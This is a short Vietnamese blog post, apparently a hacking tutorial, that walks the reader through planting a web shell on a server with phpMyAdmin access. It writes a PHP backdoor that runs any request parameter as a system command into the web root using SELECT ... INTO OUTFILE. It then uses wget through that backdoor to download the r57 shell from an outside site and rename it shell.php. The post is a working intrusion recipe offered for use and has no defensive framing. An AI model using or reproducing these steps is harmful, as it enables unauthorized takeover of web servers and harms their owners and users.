- Phải biết path của server, để làm được điều đó, tại SQL các bạn run lệnh:
Trích dẫn:SELECT @@datadir
![[Hình: xvig.png]](http://a.imageshack.us/img199/6536/xvig.png)
![[Hình: 80l3.png]](http://a.imageshack.us/img32/9144/80l3.png)
Bắt đầu nào
Đầu tiên là login vào phpmyadmin
![[Hình: SqxHA.png]](http://i.imgur.com/SqxHA.png)
Bây giờ click vào "Show MySQL system varible"
![[Hình: PvHkS.png]](http://i.imgur.com/PvHkS.png)
Sau đó chuyển qua SQL
![[Hình: TcvHs.png]](http://i.imgur.com/TcvHs.png)
Lúc này các bạn có thể chạy các lệnh SQL như tạo db, xóa bảng hoặc bất cứ điều gì, ở đây chúng ta cần là up shell.
Bây giờ chúng ta sẽ tạo một dòng cmd vào một file mới.
Trích dẫn:SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"
Mình ví dụ ở đây Server dùng Xampp (path public của xampp là [X]:\xampp\htdocs\)
Click "Go"
![[Hình: 59kn.png]](http://a.imageshack.us/img716/8970/59kn.png)
Bây giờ, file cmd.php là ở đây http://site.com/cmd.php
Tại cmd.php, chúng ta sẽ run lệnh này để download con shell ở dạng txt về và change thành php
Trích dẫn:wget http://www.r57.biz/r57.txt;mv r57.txt shell.php
Và sau đó là thành quả
![[Hình: dbq48.png]](http://i.imgur.com/dbq48.png)
0 Nhận Xét:
Post a Comment